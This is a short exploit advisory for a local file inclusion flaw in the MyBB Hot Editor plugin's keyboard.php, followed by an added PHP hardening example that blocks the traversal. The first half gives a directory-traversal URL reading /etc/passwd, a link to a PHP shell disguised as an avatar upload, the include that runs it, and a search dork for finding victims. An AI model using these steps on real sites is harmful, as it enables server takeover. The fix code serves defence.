MyBB Hot Editor Plugin Local File Inclusion


www.expw0rm.com 
Mail : liz0@expw0rm.com 
---------------------------------------
Vulnerable code: keyboard.php, line 3


	require_once "./vk_code/$first";
----------------------------------------


http://victim.com/[path]/richedit/keyboard.php?first=../../../../../../../../../../../../../../../../../etc/passwd 

And

Upload PHP shell => http://www.expw0rm.com/avatar_36.zip 

http://victim.com/[path]/richedit/keyboard.php?first=../../uploads/avatars/avatar_36.gif => the target is not shown in IE; please use Firefox.

Dork: "MTR Paket :"

// Exploit Worm www.expw0rm.com 

Original: http://www.expw0rm.com/mybb-hot-editor-plugin-local-file-inclusion_no114.html 
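
A hardened form of the include on line 3 of keyboard.php, as an added example that is not part of the original advisory or the plugin's own code. It assumes layout files sit directly in vk_code/ with plain names such as english.php (a constructed name) and that `first` arrives as a query parameter; resolve_layout() is a hypothetical helper.

```php
<?php
declare(strict_types=1);

// Added example (not the plugin's code). Hypothetical helper: map a requested
// layout name to a file inside $baseDir, or return null.
// Assumption: real layout files are plain names such as "english.php".
function resolve_layout(string $baseDir, string $requested): ?string
{
    // 1. Allowlist the name's shape: no separators, no "..", fixed extension.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\.php\z/', $requested) !== 1) {
        return null;
    }
    // 2. Canonicalise; realpath() returns false when the file does not exist.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return null;
    }
    // 3. Containment: the resolved file must still be under the base directory
    //    (also rejects a symlink in vk_code that points elsewhere).
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// In keyboard.php the include would then become:
//   $file = resolve_layout(__DIR__ . '/vk_code', (string) ($_GET['first'] ?? ''));
//   if ($file === null) { http_response_code(400); exit; }
//   require_once $file;

// Constructed demo tree standing in for richedit/vk_code and uploads/avatars.
$root = sys_get_temp_dir() . '/lfi_demo_' . bin2hex(random_bytes(4));
mkdir("$root/richedit/vk_code", 0700, true);
mkdir("$root/uploads/avatars", 0700, true);
file_put_contents("$root/richedit/vk_code/english.php", "<?php // layout\n");
file_put_contents("$root/uploads/avatars/avatar_36.gif", "GIF89a");

$samples = [
    'english.php',                          // legitimate layout name
    '../../uploads/avatars/avatar_36.gif',  // uploaded file outside vk_code
    '../../../../etc/passwd',               // directory traversal
];
foreach ($samples as $s) {
    $hit = resolve_layout("$root/richedit/vk_code", $s);
    printf("%-40s %s\n", $s, $hit === null ? 'rejected' : 'allowed');
}
```

Only the first sample is allowed. The other two fail the name check before any filesystem access, and the realpath() containment test covers the case where a name passes the pattern but resolves outside vk_code.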